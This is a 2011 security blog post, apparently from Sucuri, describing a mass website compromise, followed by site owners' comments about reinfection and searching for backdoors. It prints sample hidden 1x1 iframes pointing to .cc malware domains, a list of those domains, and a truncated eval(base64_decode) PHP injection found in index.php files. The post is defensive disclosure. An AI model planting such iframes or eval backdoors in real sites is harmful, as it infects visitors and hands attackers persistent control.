The attack from the .cc’s domains

February 25, 2011David Dede

Over the last few days we’ve continued to see a large increase in the number of sites hacked and infected with a malicious iframe from .co.cc (.vv.cc, .cz.cc, etc) domains.

You can run a free scan using SiteCheck to see if you’ve been infected.

That’s how it looks like on a hacked site:

<iframe src="http://hgerwhu45.co.cc/QQkFBg0AAQ..=" width=”1″ height=”1″>

<iframe src="http://gqgqhfdjdh.co.cc/QQkFBg0AAQ..==" width=’1` height=`1″>

The number of domains being used in this attack is quite big and only a few of them are blacklisted by Google, but we already identified those at least:

berfry43bgrbf.vv.cc
burifym.cz.cc
drelagda.vv.cc
g243gtdsgsdg.vv.cc
glkgj5j4rshdfhj.vv.cc
gqgqhfdjdh.co.cc
gs34grsgdg.vv.cc
gsdg3gsdgsdg.vv.cc
gsg3gsdgsxgsdg.vv.cc
gwsg3gsgdsgd.vv.cc
hdsh4hsfhdsj.vv.cc
hgerwhu45.co.cc
hndfdfnfdnxdnf.vv.cc
jfgdhdfhsdfh.vv.cc
jfgjfr5jdfj.vv.cc
keleghma.vv.cc
kulawield.vv.cc
maridora.vv.cc
miraswyn.cz.cc
mkgk5jswhgfnxg.vv.cc
oghmalak.vv.cc
siranaya.vv.cc
lookfeel-201101.co.cc

They change quite often, but on a hacked site, the sign is the same: Redirecting to .cc malicious sites and the following PHP code added to the index.php (among with other backdoors):

<?php eval ( base64_decode("ZXJyb3JfcmV.wb3J0aW5nKDApOw0KJGJv.dCA9IEZBTFNFIDsNC…
c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGl…
kYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW…
5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJ…

The decoded malware is available here: http://tools.sucuri.net/?page=tools&title=blacklist&detail=d08451989a742658b8e5a8c4a3788d88

Here’s our malware definition for it: http://sucuri.net/malware/malware-entry-mwjs488

Cleaning up:

Cleaning up is not very hard, you have to remove the malicious code above from your index.php files, upgrade WordPress (Joomla, osCommerce or whatever web application you are using), change all the passwords and check for backdoors (files that you didn’t add). If you need help doing that (or need someone to do it for you), we offer web site malware removal / clean up services

We will post more details /updates as we learn more.

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Regina Smola

Thanks for posting the information.

I’m seeing several sites with this same issue. I found a couple nasty trojan horse backdoor executable programs inside various wordpress plugin folders. Example: wp-content/plugins/XML-sitemap/XML-sitemap.exe. It seems that this malware is generating .exe (backdoors) using directory names. Yikes!
Air360

Thanks for posting this…I have had this attack on EVERY single site of mine….the problem Im seeing though is that even after deleting the code in about an hour it comes back to every site! I was simply replacing the index.php with a clean one from a clean wordpress install.
I will now go look at my plugins as Regina says there are some backdoors apparently
Bogdan

I can’t seem to find the backdoor (searched for .exe , .old , .bak files ; also searched plugins folders and uploads folders). Once I clean the files in several hours it gets back. It only infects index.php and index.html, basically all index files. Anyone found the form of the backdoor so far?
I’ve changed the passwords and it doesn’t seem to be modified via ftp since the modification date of the index.php files remains the same old one even after infection. It must be a wordpress hack .
Thx
Air360

I have not found it either. If you have multiple sites on one server make sure it didnt infect another site as the host and then spread across your servers sites. Im thinking it could be somewhere in mysql. What I am planning on doing tonight is setup a brand new subdoain and put a brand new clean wordpress on it and nothing else and make sure not to visit it at all and then monitor the source code and once it updates with the malware go and look at the logs and look at alll the files and try and see if i can find anything in log and any other files that were modified or messed with. Part of the problem I am having is the sites I have on my server all all developed sites…so there is content all over the database and in the directories…so its hard to know whats “wrong” and whats still legit…so hopefully this clean test site i “hope” gets infected will help narrow it down
Creatorul

This virus is way too good,I’ve pulled my hair out but I can’t give up. Going to disable the sites one by one and see which ones have the backdoor. If the virus doesnt get back then it means that’s the site with the backdoor. Have u noticed any pattern in making it get back? Seems to get back every 2-3 hours after I remove it.
MobileSnap.com

I just had the same thing happen to my sites. All of my WORDPRESS sites have the cc url’s with the iframe/eval/base64 code in the index.php. I find it crazy to believe that one older version of wordpress would allow access to my server and other directories. Is this what happened? Some non wordpress sites also have the iframe hack in them, while others do not. How do I clean it out? I’m considering just moving some over to another new fresh server. I think deleting everything is the way to go.
Pingback: Silly Wordpress, you have holes in you! – Ramblings of Narc()
Pingback: Google blocks .co.cc, attackers are now using .co.tv « -= Jarvis =-()